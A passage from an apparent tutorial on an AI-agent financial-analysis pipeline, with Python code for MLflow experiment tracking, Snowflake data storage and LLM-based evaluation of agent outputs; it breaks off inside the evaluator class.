    task_id='store_results',
    python_callable=store_results,
    dag=dag,
)

notify_task = PythonOperator(
    task_id='notify_stakeholders',
    python_callable=notify_stakeholders,
    dag=dag,
)

# Set task dependencies
extract_task >> analysis_task >> store_task >> notify_task
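
The step in `run_analysis_agents` that picks the final report out of the conversation is easy to get wrong, so it helps to isolate it as a pure function that can be tested without calling any LLM. The sketch below assumes each chat message is a dict with optional `name` and `content` keys. The function name `extract_final_report` and its parameters are hypothetical and not part of AutoGen.

```python
from typing import Dict, List, Optional


def extract_final_report(
    messages: List[Dict],
    writer_name: str = "ReportWriter",
    min_fallback_chars: int = 500,
) -> Optional[str]:
    """Pick the report text out of a group-chat transcript.

    Preference order:
      1. the most recent non-empty message from `writer_name`
      2. the most recent message longer than `min_fallback_chars`
    Returns None when neither exists.
    """
    # Pass 1: newest message written by the report writer
    for message in reversed(messages):
        content = message.get("content") or ""  # content may be None
        if message.get("name") == writer_name and content.strip():
            return content

    # Pass 2: newest message that is long enough to plausibly be a report
    for message in reversed(messages):
        content = message.get("content") or ""
        if len(content) > min_fallback_chars:
            return content

    return None


if __name__ == "__main__":
    transcript = [
        {"name": "FinancialAnalyst", "content": "AAPL closed higher on the day."},
        {"name": "ReportWriter", "content": "Daily report: AAPL closed higher."},
        {"name": "DataScientist", "content": None},
    ]
    print(extract_final_report(transcript))
```

Matching on the speaker name rather than on the message role keeps the function independent of how a particular framework version labels roles inside a group chat.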

For tracking experiments and agent performance, let's implement an MLflow tracking component:

python
# mlflow_tracking.py
import os
import json
import mlflow
import datetime
import pandas as pd
from typing import Dict, Any, Optional

class AIAgentExperimentTracker:
    """Track AI agent experiments with MLflow."""

    def __init__(
        self,
        experiment_name: str,
        tracking_uri: Optional[str] = None,
        tags: Optional[Dict[str, str]] = None
    ):
        """
        Initialize the experiment tracker.

        Args:
            experiment_name: Name of the MLflow experiment
            tracking_uri: Optional URI for MLflow tracking server
            tags: Optional tags for the experiment
        """
        self.experiment_name = experiment_name

        # Set tracking URI if provided
        if tracking_uri:
            mlflow.set_tracking_uri(tracking_uri)

        # Set default tags
        self.default_tags = tags or {}

        # Get or create experiment
        try:
            self.experiment = mlflow.get_experiment_by_name(experiment_name)
            if not self.experiment:
                self.experiment_id = mlflow.create_experiment(
                    experiment_name,
                    tags=self.default_tags
                )
            else:
                self.experiment_id = self.experiment.experiment_id
        except Exception as e:
            print(f"Error initializing MLflow experiment: {e}")
            self.experiment_id = None

    def start_run(
        self,
        run_name: Optional[str] = None,
        tags: Optional[Dict[str, str]] = None,
        agent_config: Optional[Dict[str, Any]] = None
    ) -> Optional[str]:
        """
        Start a new MLflow run.

        Args:
            run_name: Optional name for the run
            tags: Optional tags for the run
            agent_config: Optional agent configuration to log

        Returns:
            MLflow run ID, or None if the run could not be started
        """
        # Generate default run name if not provided
        if not run_name:
            run_name = f"agent_run_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}"

        # Combine default tags with run-specific tags
        run_tags = {**self.default_tags, **(tags or {})}

        try:
            # Start the run
            mlflow.start_run(
                experiment_id=self.experiment_id,
                run_name=run_name,
                tags=run_tags
            )

            # Log agent configuration if provided
            if agent_config:
                # Log nested dictionaries as separate params for better organization
                self._log_nested_params("agent", agent_config)

                # Also log the raw config as JSON artifact for preservation
                config_path = f"/tmp/agent_config_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
                with open(config_path, 'w') as f:
                    json.dump(agent_config, f, indent=2)

                mlflow.log_artifact(config_path)
                os.remove(config_path)

            return mlflow.active_run().info.run_id

        except Exception as e:
            print(f"Error starting MLflow run: {e}")
            return None

    def log_agent_interaction(
        self,
        agent_name: str,
        prompt: str,
        response: str,
        metrics: Optional[Dict[str, float]] = None,
        metadata: Optional[Dict[str, Any]] = None
    ):
        """
        Log an agent interaction.

        Args:
            agent_name: Name of the agent
            prompt: Prompt sent to agent
            response: Agent response
            metrics: Optional metrics for the interaction
            metadata: Optional metadata about the interaction
        """
        try:
            # Ensure we have an active run
            if not mlflow.active_run():
                self.start_run(f"{agent_name}_interactions")

            # Log metrics if provided
            if metrics:
                for key, value in metrics.items():
                    if isinstance(value, (int, float)):
                        mlflow.log_metric(f"{agent_name}_{key}", value)

            # Log metadata as parameters
            if metadata:
                flat_metadata = self._flatten_dict(metadata)
                for key, value in flat_metadata.items():
                    if isinstance(value, (str, int, float, bool)):
                        mlflow.log_param(f"{agent_name}_{key}", value)

            # Log the interaction as text
            interaction_path = f"/tmp/{agent_name}_interaction_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.txt"
            with open(interaction_path, 'w') as f:
                f.write(f"PROMPT:\n{prompt}\n\nRESPONSE:\n{response}")

            mlflow.log_artifact(interaction_path, artifact_path=f"interactions/{agent_name}")
            os.remove(interaction_path)

        except Exception as e:
            print(f"Error logging agent interaction: {e}")

    def log_agent_evaluation(
        self,
        evaluations: Dict[str, Any],
        metrics: Optional[Dict[str, float]] = None
    ):
        """
        Log agent evaluation results.

        Args:
            evaluations: Evaluation results
            metrics: Additional metrics to log
        """
        try:
            # Ensure we have an active run
            if not mlflow.active_run():
                self.start_run("agent_evaluation")

            # Log evaluation metrics
            if metrics:
                for key, value in metrics.items():
                    if isinstance(value, (int, float)):
                        mlflow.log_metric(key, value)

            # Log structured evaluations
            evaluation_path = f"/tmp/evaluation_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
            with open(evaluation_path, 'w') as f:
                json.dump(evaluations, f, indent=2)

            mlflow.log_artifact(evaluation_path, artifact_path="evaluations")
            os.remove(evaluation_path)

            # If evaluations contain numeric scores, log as metrics
            flat_evals = self._flatten_dict(evaluations)
            for key, value in flat_evals.items():
                if isinstance(value, (int, float)):
                    mlflow.log_metric(f"eval_{key}", value)

        except Exception as e:
            print(f"Error logging agent evaluation: {e}")

    def log_output_data(
        self,
        data: Any,
        output_format: str = "json",
        name: Optional[str] = None
    ):
        """
        Log output data from an agent run.

        Args:
            data: Data to log
            output_format: Format to use (json, csv, txt)
            name: Optional name for the output
        """
        try:
            # Ensure we have an active run
            if not mlflow.active_run():
                self.start_run("agent_output")

            if name is None:
                name = f"output_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}"

            # Process based on format
            if output_format == "json":
                output_path = f"/tmp/{name}.json"
                with open(output_path, 'w') as f:
                    if isinstance(data, str):
                        f.write(data)
                    else:
                        json.dump(data, f, indent=2, default=str)

            elif output_format == "csv":
                output_path = f"/tmp/{name}.csv"
                if isinstance(data, pd.DataFrame):
                    data.to_csv(output_path, index=False)
                elif isinstance(data, list) and all(isinstance(x, dict) for x in data):
                    pd.DataFrame(data).to_csv(output_path, index=False)
                else:
                    raise ValueError("Data must be DataFrame or list of dicts for CSV format")

            elif output_format == "txt":
                output_path = f"/tmp/{name}.txt"
                with open(output_path, 'w') as f:
                    f.write(str(data))

            else:
                raise ValueError(f"Unsupported output format: {output_format}")

            # Log the artifact
            mlflow.log_artifact(output_path, artifact_path="outputs")
            os.remove(output_path)

        except Exception as e:
            print(f"Error logging output data: {e}")

    def end_run(self):
        """End the current MLflow run."""
        try:
            if mlflow.active_run():
                mlflow.end_run()
        except Exception as e:
            print(f"Error ending MLflow run: {e}")

    def _log_nested_params(self, prefix, params_dict):
        """Log nested parameters with prefixed keys."""
        flat_params = self._flatten_dict(params_dict, prefix)
        for key, value in flat_params.items():
            if isinstance(value, (str, int, float, bool)):
                mlflow.log_param(key, value)

    def _flatten_dict(self, d, parent_key='', sep='_'):
        """Flatten nested dictionaries for parameter logging."""
        items = []
        for k, v in d.items():
            new_key = f"{parent_key}{sep}{k}" if parent_key else k
            if isinstance(v, dict):
                items.extend(self._flatten_dict(v, new_key, sep=sep).items())
            else:
                items.append((new_key, v))
        return dict(items)

267
268# Example usage
269if __name__ == "__main__":
270 # Initialize tracker
271 tracker = AIAgentExperimentTracker(
272 experiment_name="financial_analysis_agents",
273 tags={"domain": "finance", "purpose": "stock_analysis"}
274 )
275
276 # Start a run
277 run_id = tracker.start_run(
278 run_name="daily_market_analysis",
279 tags={"stocks": "AAPL,MSFT,GOOGL", "date": "2023-09-15"},
280 agent_config={
281 "agent_types": ["FinancialAnalyst", "DataScientist", "ReportWriter"],
282 "models": {
283 "primary": "gpt-4-turbo",
284 "fallback": "gpt-3.5-turbo"
285 },
286 "temperature": 0.2
287 }
288 )
289
290 # Log sample interaction
291 tracker.log_agent_interaction(
292 agent_name="FinancialAnalyst",
293 prompt="Analyze AAPL performance on 2023-09-15",
294 response="Apple (AAPL) closed at $175.62, down 0.8% from previous close...",
295 metrics={
296 "tokens": 250,
297 "response_time": 0.85,
298 "cost": 0.02
299 },
300 metadata={
301 "model": "gpt-4-turbo",
302 "temperature": 0.2
303 }
304 )
305
306 # Log evaluation
307 tracker.log_agent_evaluation(
308 evaluations={
309 "accuracy": 0.92,
310 "completeness": 0.88,
311 "reasoning": 0.90,
312 "usefulness": 0.85,
313 "detailed_scores": {
314 "factual_accuracy": 0.95,
315 "calculation_accuracy": 0.89,
316 "insight_quality": 0.87
317 }
318 },
319 metrics={
320 "overall_quality": 0.89,
321 "execution_time": 12.5
322 }
323 )
324
325 # Log output
326 tracker.log_output_data(
327 {
328 "report": "Financial Analysis Report - 2023-09-15",
329 "stocks_analyzed": ["AAPL", "MSFT", "GOOGL"],
330 "key_insights": [
331 "Tech sector showed weakness with average decline of 0.7%",
332 "AAPL volume 15% above 30-day average despite price decline",
333 "MSFT outperformed peers with 0.2% gain"
334 ]
335 },
336 output_format="json",
337 name="financial_report"
338 )
339
340 # End the run
341 tracker.end_run()
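
The evaluation logged above contains a nested `detailed_scores` dictionary, so it helps to see which metric names actually reach MLflow. The sketch below is a standalone copy of the flattening logic, not the tracker itself; `flatten_dict` and `metric_names` are illustrative names, and unlike the tracker this version also skips booleans (which Python treats as integers).

```python
from typing import Any, Dict


def flatten_dict(d: Dict[str, Any], parent_key: str = "", sep: str = "_") -> Dict[str, Any]:
    """Flatten nested dictionaries, joining keys with `sep`."""
    items: Dict[str, Any] = {}
    for key, value in d.items():
        new_key = f"{parent_key}{sep}{key}" if parent_key else key
        if isinstance(value, dict):
            items.update(flatten_dict(value, new_key, sep=sep))
        else:
            items[new_key] = value
    return items


def metric_names(evaluations: Dict[str, Any]) -> Dict[str, float]:
    """Return the eval_* metrics derived from an evaluations dictionary."""
    return {
        f"eval_{key}": value
        for key, value in flatten_dict(evaluations).items()
        # bool is a subclass of int, so it is excluded explicitly in this sketch
        if isinstance(value, (int, float)) and not isinstance(value, bool)
    }


evaluations = {
    "accuracy": 0.92,
    "detailed_scores": {"factual_accuracy": 0.95, "insight_quality": 0.87},
    "notes": "free text is skipped",
}
print(metric_names(evaluations))
```

Nested keys are joined with underscores, so `detailed_scores.factual_accuracy` becomes `eval_detailed_scores_factual_accuracy`, while non-numeric values are stored only in the JSON artifact.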

Let's also create a Snowflake integration component for enterprise data management:

python
1# snowflake_integration.py
2import os
3import json
4import pandas as pd
5import snowflake.connector
6from snowflake.connector.pandas_tools import write_pandas
7from typing import Dict, Any, List, Optional, Union
8
9class SnowflakeAgentIntegration:
10 """Integration with Snowflake for AI agent data pipelines."""
11
12 def __init__(
13 self,
14 account: str,
15 user: str,
16 password: Optional[str] = None,
17 database: Optional[str] = None,
18 schema: Optional[str] = None,
19 warehouse: Optional[str] = None,
20 role: Optional[str] = None,
21 authenticator: Optional[str] = None,
22 private_key_path: Optional[str] = None,
23 private_key_passphrase: Optional[str] = None
24 ):
25 """
26 Initialize Snowflake connection parameters.
27
28 Args:
29 account: Snowflake account identifier
30 user: Snowflake username
31 password: Optional password (use private key or SSO instead for production)
32 database: Default database
33 schema: Default schema
34 warehouse: Compute warehouse
35 role: Snowflake role
36 authenticator: Authentication method (e.g., 'externalbrowser' for SSO)
37 private_key_path: Path to private key file for key-pair authentication
38 private_key_passphrase: Passphrase for private key if encrypted
39 """
40 self.account = account
41 self.user = user
42 self.password = password
43 self.database = database
44 self.schema = schema
45 self.warehouse = warehouse
46 self.role = role
47 self.authenticator = authenticator
48 self.private_key_path = private_key_path
49 self.private_key_passphrase = private_key_passphrase
50
51 # Initialize connection as None
52 self.conn = None
53
54 def connect(self):
55 """Establish connection to Snowflake."""
56 try:
57 # Prepare connection parameters
58 connect_params = {
59 "account": self.account,
60 "user": self.user,
61 "database": self.database,
62 "schema": self.schema,
63 "warehouse": self.warehouse,
64 "role": self.role
65 }
66
67 # Add authentication method
68 if self.password:
69 connect_params["password"] = self.password
70 elif self.authenticator:
71 connect_params["authenticator"] = self.authenticator
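72 elif self.private_key_path:
73 # The connector expects DER-encoded PKCS8 bytes, not the raw PEM file contents
74 from cryptography.hazmat.primitives import serialization
75 passphrase = self.private_key_passphrase.encode() if self.private_key_passphrase else None
76 with open(self.private_key_path, "rb") as key:
77 p_key = serialization.load_pem_private_key(key.read(), password=passphrase)
78 connect_params["private_key"] = p_key.private_bytes(
79 serialization.Encoding.DER, serialization.PrivateFormat.PKCS8, serialization.NoEncryption())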
80
81 # Remove None values
82 connect_params = {k: v for k, v in connect_params.items() if v is not None}
83
84 # Establish connection
85 self.conn = snowflake.connector.connect(**connect_params)
86
87 return self.conn
88
89 except Exception as e:
90 print(f"Error connecting to Snowflake: {e}")
91 raise
92
93 def execute_query(self, query: str, params: Dict[str, Any] = None) -> List[Dict[str, Any]]:
94 """
95 Execute a SQL query and return results as list of dictionaries.
96
97 Args:
98 query: SQL query to execute
99 params: Optional query parameters
100
101 Returns:
102 List of dictionaries with query results
103 """
104 try:
105 # Connect if not already connected
106 if not self.conn:
107 self.connect()
108
109 # Create cursor and execute query
110 cursor = self.conn.cursor(snowflake.connector.DictCursor)
111
112 if params:
113 cursor.execute(query, params)
114 else:
115 cursor.execute(query)
116
117 # Fetch results
118 results = cursor.fetchall()
119
120 # Close cursor
121 cursor.close()
122
123 return results
124
125 except Exception as e:
126 print(f"Error executing query: {e}")
127 raise
128
129 def query_to_dataframe(self, query: str, params: Dict[str, Any] = None) -> pd.DataFrame:
130 """
131 Execute a SQL query and return results as Pandas DataFrame.
132
133 Args:
134 query: SQL query to execute
135 params: Optional query parameters
136
137 Returns:
138 Pandas DataFrame with query results
139 """
140 try:
141 # Connect if not already connected
142 if not self.conn:
143 self.connect()
144
145 # Execute query directly to DataFrame
146 if params:
147 df = pd.read_sql(query, self.conn, params=params)
148 else:
149 df = pd.read_sql(query, self.conn)
150
151 return df
152
153 except Exception as e:
154 print(f"Error executing query to DataFrame: {e}")
155 raise
156
157 def upload_dataframe(
158 self,
159 df: pd.DataFrame,
160 table_name: str,
161 schema: Optional[str] = None,
162 database: Optional[str] = None,
163 chunk_size: Optional[int] = None,
164 auto_create_table: bool = False
165 ) -> Dict[str, Any]:
166 """
167 Upload a Pandas DataFrame to Snowflake table.
168
169 Args:
170 df: DataFrame to upload
171 table_name: Destination table name
172 schema: Optional schema (overrides default)
173 database: Optional database (overrides default)
174 chunk_size: Optional chunk size for large uploads
175 auto_create_table: Whether to automatically create table if it doesn't exist
176
177 Returns:
178 Dictionary with upload results
179 """
180 try:
181 # Connect if not already connected
182 if not self.conn:
183 self.connect()
184
185 # Use default schema/database if not specified
186 schema = schema or self.schema
187 database = database or self.database
188
189 # Create fully qualified table name
190 qualified_table_name = f"{database}.{schema}.{table_name}" if database and schema else table_name
191
192 # Check if table exists
193 if auto_create_table:
194 self._ensure_table_exists(df, qualified_table_name)
195
196 # Upload DataFrame
197 success, num_chunks, num_rows, output = write_pandas(
198 conn=self.conn,
199 df=df,
200 table_name=table_name,
201 schema=schema,
202 database=database,
203 chunk_size=chunk_size,
204 quote_identifiers=True
205 )
206
207 return {
208 "success": success,
209 "chunks": num_chunks,
210 "rows": num_rows,
211 "output": output,
212 "table": qualified_table_name
213 }
214
215 except Exception as e:
216 print(f"Error uploading DataFrame: {e}")
217 raise
218
219 def upload_json(
220 self,
221 data: Union[Dict[str, Any], List[Dict[str, Any]]],
222 table_name: str,
223 schema: Optional[str] = None,
224 database: Optional[str] = None,
225 flatten: bool = False
226 ) -> Dict[str, Any]:
227 """
228 Upload JSON data to Snowflake table.
229
230 Args:
231 data: Dictionary or list of dictionaries to upload
232 table_name: Destination table name
233 schema: Optional schema (overrides default)
234 database: Optional database (overrides default)
235 flatten: Whether to flatten nested structures
236
237 Returns:
238 Dictionary with upload results
239 """
240 try:
241 # Convert to DataFrame based on data type
242 if isinstance(data, dict):
243 if flatten:
244 # Flatten nested dict
245 flat_data = self._flatten_json(data)
246 df = pd.DataFrame([flat_data])
247 else:
248 # Convert single dict to DataFrame with one row
249 df = pd.DataFrame([data])
250 elif isinstance(data, list) and all(isinstance(item, dict) for item in data):
251 if flatten:
252 # Flatten each dict in the list
253 flat_list = [self._flatten_json(item) for item in data]
254 df = pd.DataFrame(flat_list)
255 else:
256 # Convert list of dicts directly to DataFrame
257 df = pd.DataFrame(data)
258 else:
259 raise ValueError("Data must be a dictionary or list of dictionaries")
260
261 # Handle nested JSON structures by converting to strings
262 for col in df.columns:
263 if df[col].apply(lambda x: isinstance(x, (dict, list))).any():
264 df[col] = df[col].apply(lambda x: json.dumps(x) if isinstance(x, (dict, list)) else x)
265
266 # Upload the DataFrame
267 return self.upload_dataframe(
268 df=df,
269 table_name=table_name,
270 schema=schema,
271 database=database,
272 auto_create_table=True
273 )
274
275 except Exception as e:
276 print(f"Error uploading JSON: {e}")
277 raise
278
279 def store_agent_results(
280 self,
281 agent_results: Dict[str, Any],
282 metadata: Dict[str, Any],
283 table_name: str = "AGENT_RESULTS",
284 schema: Optional[str] = None,
285 database: Optional[str] = None
286 ) -> Dict[str, Any]:
287 """
288 Store AI agent results with metadata in Snowflake.
289
290 Args:
291 agent_results: Results from AI agent
292 metadata: Metadata about the agent run
293 table_name: Destination table name
294 schema: Optional schema (overrides default)
295 database: Optional database (overrides default)
296
297 Returns:
298 Dictionary with upload results
299 """
300 try:
301 # Prepare combined data
302 combined_data = {
303 "results": json.dumps(agent_results),
304 "metadata": json.dumps(metadata),
305 "created_at": pd.Timestamp.now()
306 }
307
308 # Add metadata fields as top-level columns for easier querying
309 for key, value in metadata.items():
310 if isinstance(value, (str, int, float, bool)) or value is None:
311 combined_data[f"meta_{key}"] = value
312
313 # Upload to Snowflake
314 df = pd.DataFrame([combined_data])
315 return self.upload_dataframe(
316 df=df,
317 table_name=table_name,
318 schema=schema,
319 database=database,
320 auto_create_table=True
321 )
322
323 except Exception as e:
324 print(f"Error storing agent results: {e}")
325 raise
326
327 def close(self):
328 """Close the Snowflake connection."""
329 if self.conn:
330 self.conn.close()
331 self.conn = None
332
333 def _ensure_table_exists(self, df: pd.DataFrame, table_name: str):
334 """
335 Create table if it doesn't exist based on DataFrame structure.
336
337 Args:
338 df: DataFrame to use for table schema
339 table_name: Fully qualified table name
340 """
341 try:
342 # Check if table exists
343 check_query = f"SHOW TABLES LIKE '{table_name.split('.')[-1]}'"
344 if '.' in table_name:
345 parts = table_name.split('.')
346 if len(parts) == 3:
347 check_query = f"SHOW TABLES LIKE '{parts[2]}' IN SCHEMA {parts[0]}.{parts[1]}"
348
349 cursor = self.conn.cursor()
350 cursor.execute(check_query)
351 table_exists = cursor.fetchone() is not None
352
353 if not table_exists:
354 # Generate CREATE TABLE statement based on DataFrame
355 columns = []
356 for col_name, dtype in zip(df.columns, df.dtypes):
357 if pd.api.types.is_integer_dtype(dtype):
358 col_type = "INTEGER"
359 elif pd.api.types.is_float_dtype(dtype):
360 col_type = "FLOAT"
361 elif pd.api.types.is_bool_dtype(dtype):
362 col_type = "BOOLEAN"
363 elif pd.api.types.is_datetime64_dtype(dtype):
364 col_type = "TIMESTAMP_NTZ"
365 else:
366 # Check if column contains JSON
367 if df[col_name].iloc[0] and isinstance(df[col_name].iloc[0], str):
368 try:
369 parsed = json.loads(df[col_name].iloc[0])
370 col_type = "VARIANT" if isinstance(parsed, (dict, list)) else "VARCHAR" # VARIANT only for JSON objects/arrays
371 except ValueError:
372 col_type = "VARCHAR"
373 else:
374 col_type = "VARCHAR"
375
376 columns.append(f'"{col_name}" {col_type}')
377
378 # Create the table
379 create_query = f"CREATE TABLE IF NOT EXISTS {table_name} ({', '.join(columns)})"
380 cursor.execute(create_query)
381
382 cursor.close()
383
384 except Exception as e:
385 print(f"Error creating table: {e}")
386 raise
387
388 def _flatten_json(self, d: Dict[str, Any], parent_key: str = '', sep: str = '_') -> Dict[str, Any]:
389 """
390 Flatten nested JSON structures.
391
392 Args:
393 d: Dictionary to flatten
394 parent_key: Parent key for recursive calls
395 sep: Separator for nested keys
396
397 Returns:
398 Flattened dictionary
399 """
400 items = []
401 for k, v in d.items():
402 new_key = f"{parent_key}{sep}{k}" if parent_key else k
403
404 if isinstance(v, dict):
405 items.extend(self._flatten_json(v, new_key, sep=sep).items())
406 elif isinstance(v, list):
407 # Convert lists to JSON strings
408 items.append((new_key, json.dumps(v)))
409 else:
410 items.append((new_key, v))
411
412 return dict(items)
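
Because `_ensure_table_exists` interpolates table, schema, and database names directly into SQL text, it is worth validating those names before they reach a query. The following is a minimal sketch under the assumption that only unquoted identifiers are used; `safe_identifier` and `qualified_table_name` are hypothetical helpers, not part of the Snowflake connector.

```python
import re
from typing import Optional

# Unquoted Snowflake identifiers start with a letter or underscore and may
# contain letters, digits, underscores, and dollar signs.
_IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_$]*")


def safe_identifier(name: str) -> str:
    """Return the name unchanged if it is a plain identifier, else raise."""
    if not _IDENTIFIER.fullmatch(name):
        raise ValueError(f"Unsafe SQL identifier: {name!r}")
    return name


def qualified_table_name(
    table: str, schema: Optional[str] = None, database: Optional[str] = None
) -> str:
    """Build DATABASE.SCHEMA.TABLE when both qualifiers are given, else TABLE."""
    if database and schema:
        parts = [database, schema, table]
    else:
        parts = [table]
    return ".".join(safe_identifier(part) for part in parts)


print(qualified_table_name("AGENT_RESULTS", "PUBLIC", "ANALYTICS"))
```

Values such as dates or ticker symbols should still be passed through the `params` argument of `execute_query` rather than formatted into the query string; a check like this only covers identifiers, which cannot be bound as parameters.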

Let's also implement an agent evaluation component:

python
1# agent_evaluation.py
2import json
3import pandas as pd
4import numpy as np
5import openai
6from typing import Dict, Any, List, Optional, Union, Tuple
7
8class AgentEvaluator:
9 """Evaluate AI agents for quality, correctness, and performance."""
10
11 def __init__(self, openai_api_key: str):
12 """
13 Initialize the evaluator.
14
15 Args:
16 openai_api_key: OpenAI API key for evaluation
17 """
18 self.openai_client = openai.OpenAI(api_key=openai_api_key)
19
20 def evaluate_agent_output(
21 self,
22 prompt: str,
23 response: str,
24 ground_truth: Optional[str] = None,
25 criteria: Optional[List[str]] = None
26 ) -> Dict[str, Any]:
27 """
28 Evaluate an agent's response against criteria and optionally ground truth.
29
30 Args:
31 prompt: The original prompt given to the agent
32 response: The agent's response
33 ground_truth: Optional ground truth for factual comparison
34 criteria: Optional evaluation criteria
35
36 Returns:
37 Dictionary with evaluation scores and feedback
38 """
39 if criteria is None:
40 criteria = [
41 "accuracy",
42 "completeness",
43 "relevance",
44 "coherence",
45 "conciseness"
46 ]
47
48 # Construct evaluation prompt
49 eval_prompt = f"""Evaluate the following AI assistant response to a user prompt.
50
51USER PROMPT:
52{prompt}
53
54AI RESPONSE:
55{response}
56
57"""
58 if ground_truth:
59 eval_prompt += f"""
60GROUND TRUTH (for factual comparison):
61{ground_truth}
62
63"""
64
65 eval_prompt += f"""
66Please evaluate the response on the following criteria on a scale of 1-10:
67{', '.join(criteria)}
68
69Provide an explanation for each score and give specific examples from the response.
70Then provide an overall score (1-10) and a brief summary of the evaluation.
71
72Format your response as a JSON object with the following structure:
73{{
74 "criteria_scores": {{
75 "criterion1": {{
76 "score": X,
77 "explanation": "Your explanation"
78 }},
79 ...
80 }},
81 "overall_score": X,
82 "summary": "Your summary",
83 "strengths": ["strength1", "strength2", ...],
84 "weaknesses": ["weakness1", "weakness2", ...]
85}}
86"""
87
88 try:
89 # Get evaluation from OpenAI (named `completion` so it does not shadow the `response` argument used below)
90 completion = self.openai_client.chat.completions.create(
91 model="gpt-4-turbo",
92 messages=[
93 {"role": "system", "content": "You are an objective evaluator of AI assistant responses. Provide fair, balanced, and detailed evaluations."},
94 {"role": "user", "content": eval_prompt}
95 ],
96 response_format={"type": "json_object"},
97 temperature=0.2
98 )
99
100 # Parse the result
101 evaluation = json.loads(completion.choices[0].message.content)
102
103 # Add metadata
104 evaluation["evaluation_metadata"] = {
105 "model": "gpt-4-turbo",
106 "prompt_length": len(prompt),
107 "response_length": len(response),
108 "criteria_evaluated": criteria
109 }
110
111 return evaluation
112
113 except Exception as e:
114 print(f"Error evaluating agent output: {e}")
115 return {
116 "error": str(e),
117 "criteria_scores": {c: {"score": 0, "explanation": "Evaluation failed"} for c in criteria},
118 "overall_score": 0,
119 "summary": f"Evaluation failed: {str(e)}"
120 }
121
122 def evaluate_factual_accuracy(
123 self,
124 response: str,
125 ground_truth: str
126 ) -> Dict[str, Any]:
127 """
128 Evaluate the factual accuracy of an agent's response.
129
130 Args:
131 response: The agent's response
132 ground_truth: The ground truth for comparison
133
134 Returns:
135 Dictionary with accuracy scores and details
136 """
137 try:
138 # Construct evaluation prompt
139 eval_prompt = f"""Evaluate the factual accuracy of the following AI response compared to the ground truth.
140
141AI RESPONSE:
142{response}
143
144GROUND TRUTH:
145{ground_truth}
146
147Identify all factual statements in the AI response and check if they are:
1481. Correct (matches ground truth)
1492. Incorrect (contradicts ground truth)
1503. Unverifiable (not mentioned in ground truth)
151
152For each factual claim, provide:
1531. The claim from the AI response
1542. Whether it's correct, incorrect, or unverifiable
1553. The relevant ground truth information (if applicable)
156
157Then calculate:
1581. Accuracy rate (correct claims / total verifiable claims)
1592. Error rate (incorrect claims / total verifiable claims)
1603. Hallucination rate (unverifiable claims / total claims)
161
162Format your response as a JSON object with the following structure:
163{{
164 "factual_claims": [
165 {{
166 "claim": "The claim text",
167 "assessment": "correct|incorrect|unverifiable",
168 "ground_truth_reference": "Relevant ground truth text or null",
169 "explanation": "Explanation of assessment"
170 }},
171 ...
172 ],
173 "metrics": {{
174 "total_claims": X,
175 "correct_claims": X,
176 "incorrect_claims": X,
177 "unverifiable_claims": X,
178 "accuracy_rate": X.XX,
179 "error_rate": X.XX,
180 "hallucination_rate": X.XX
181 }},
182 "summary": "Overall assessment of factual accuracy"
183}}
184"""
185
186 # Get evaluation from OpenAI (named `completion` so it does not shadow the `response` argument)
187 completion = self.openai_client.chat.completions.create(
188 model="gpt-4-turbo",
189 messages=[
190 {"role": "system", "content": "You are an expert fact-checker who carefully evaluates the factual accuracy of information."},
191 {"role": "user", "content": eval_prompt}
192 ],
193 response_format={"type": "json_object"},
194 temperature=0.1
195 )
196
197 # Parse the result
198 evaluation = json.loads(completion.choices[0].message.content)
199
200 return evaluation
201
202 except Exception as e:
203 print(f"Error evaluating factual accuracy: {e}")
204 return {
205 "error": str(e),
206 "metrics": {
207 "accuracy_rate": 0,
208 "error_rate": 0,
209 "hallucination_rate": 0
210 },
211 "summary": f"Evaluation failed: {str(e)}"
212 }
213
214 def evaluate_multi_agent_workflow(
215 self,
216 task_description: str,
217 agent_interactions: List[Dict[str, Any]],
218 final_output: str,
219 expected_output: Optional[str] = None
220 ) -> Dict[str, Any]:
221 """
222 Evaluate a multi-agent workflow.
223
224 Args:
225 task_description: The original task
226 agent_interactions: List of agent interactions in the workflow
227 final_output: The final output of the workflow
228 expected_output: Optional expected output for comparison
229
230 Returns:
231 Dictionary with workflow evaluation
232 """
233 try:
234 # Format agent interactions for evaluation
235 interactions_text = ""
236 for i, interaction in enumerate(agent_interactions, 1):
237 agent_name = interaction.get("agent_name", f"Agent {i}")
238 prompt = interaction.get("prompt", "")
239 response = interaction.get("response", "")
240
241 interactions_text += f"\n--- INTERACTION {i} ---\n"
242 interactions_text += f"AGENT: {agent_name}\n"
243 interactions_text += f"PROMPT:\n{prompt}\n\n"
244 interactions_text += f"RESPONSE:\n{response}\n"
245
246 # Construct evaluation prompt
247 eval_prompt = f"""Evaluate this multi-agent workflow for completing a task.
248
249TASK DESCRIPTION:
250{task_description}
251
252AGENT INTERACTIONS:
253{interactions_text}
254
255FINAL OUTPUT:
256{final_output}
257
258"""
259 if expected_output:
260 eval_prompt += f"""
261EXPECTED OUTPUT:
262{expected_output}
263
264"""
265
266 eval_prompt += """
267Evaluate the workflow on these criteria:
2681. Task Completion: Did the agents successfully complete the task?
2692. Efficiency: Was the workflow efficient, or were there unnecessary steps?
2703. Agent Collaboration: How well did the agents collaborate and share information?
2714. Agent Specialization: Did each agent contribute based on their expertise?
2725. Error Handling: How well were errors or uncertainties handled?
2736. Output Quality: How good is the final output?
274
275Format your response as a JSON object with the following structure:
276{
277 "workflow_evaluation": {
278 "task_completion": {
279 "score": X,
280 "comments": "Your assessment"
281 },
282 "efficiency": {
283 "score": X,
284 "comments": "Your assessment"
285 },
286 "agent_collaboration": {
287 "score": X,
288 "comments": "Your assessment"
289 },
290 "agent_specialization": {
291 "score": X,
292 "comments": "Your assessment"
293 },
294 "error_handling": {
295 "score": X,
296 "comments": "Your assessment"
297 },
298 "output_quality": {
299 "score": X,
300 "comments": "Your assessment"
301 }
302 },
303 "agent_contributions": [
304 {
305 "agent_name": "Agent name",
306 "contribution_quality": X,
307 "key_contributions": ["contribution1", "contribution2"]
308 },
309 ...
310 ],
311 "overall_score": X,
312 "improvement_suggestions": ["suggestion1", "suggestion2", ...],
313 "summary": "Overall workflow assessment"
314}
315"""
316
317 # Get evaluation from OpenAI (named `completion` to keep it distinct from the per-interaction `response` strings)
318 completion = self.openai_client.chat.completions.create(
319 model="gpt-4-turbo",
320 messages=[
321 {"role": "system", "content": "You are an expert in multi-agent AI systems who evaluates workflows for efficiency and effectiveness."},
